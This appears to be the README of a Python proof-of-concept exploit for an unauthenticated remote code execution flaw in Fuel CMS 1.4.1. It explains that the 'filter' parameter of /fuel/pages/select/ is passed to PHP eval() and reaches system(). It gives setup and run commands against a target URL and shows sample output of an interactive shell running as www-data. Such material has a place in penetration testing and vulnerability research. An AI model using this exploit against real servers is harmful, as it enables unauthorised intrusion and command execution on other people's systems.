
Python PoC for unauthenticated remote code execution in Fuel CMS 1.4.1 via the `filter` parameter, providing an interactive shell for command execution.
Unauthenticated RCE vulnerability in Fuel CMS 1.4.1. The
filterparameter in the/fuel/pages/select/endpoint is passed unsanitized to aeval()call in the PHP backend, allowing arbitrary code execution via a crafted payload. Unlike blind injections, the output is reflected directly in the HTTP response, so no intermediate file is needed.
/fuel/pages/select/ with a specially crafted filter payload that calls PHP's system() with the desired command.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://TARGET
Example:
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit